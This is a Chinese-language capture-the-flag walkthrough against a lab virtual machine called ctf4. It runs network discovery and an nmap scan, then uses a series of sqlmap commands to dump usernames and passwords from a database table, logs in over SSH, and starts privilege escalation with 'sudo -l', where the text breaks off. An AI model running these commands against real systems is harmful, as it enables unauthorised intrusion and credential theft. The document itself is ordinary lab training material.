实验环境:
kali linux的IP地址为192.168.42.137一、实验过程
1、信息收集
2、漏洞挖掘
3、权限提升
二、使用步骤
1.信息收集
1.1 主机发现
netdiscover -i eth0 -r 192.168.42.0/24
1.2 端口扫描
nmap -sS -sV -A -v 192.168.42.139
1.3危险建模
25、80、631端口开放
靶机开放端口及对应的服务:
22端口: SSH服务(远程登录服务)
25端口: SMTP服务
80端口: HTTP服务
使用浏览器访问一下ctf4:
寻找突破点:
通过分析可知有可能存在SQL注入漏洞
2.sqlmap进行漏洞利用
1、sql注入漏洞探测(爆后台数据库)
sqlmap -u "http://192.168.42.139/index.html?page=blog&title=Blog&id=2" --dbs
后台数据库:
查看敏感数据库中的表
sqlmap -u "http://192.168.42.139/index.html?page=blog&title=Blog&id=2" --dbs -D ehks --tables
查看敏感表中的字段:
sqlmap -u "http://192.168.42.139/index.html?page=blog&title=Blog&id=2" --dbs -D ehks --tables -T user --columns
查看敏感字段的内容(爆破用户名和密码):
sqlmap -u "http://192.168.42.139/index.html?page=blog&title=Blog&id=2" --dbs -D ehks --tables -T user --columns -C user_name,user_pass --dump
2.远程登录(22端口):
ssh dstevens@192.168.42.139
报错信息如下:
解决方法:SSH登录报错
解决后远程登录成功
提升为root用户:
sudo -l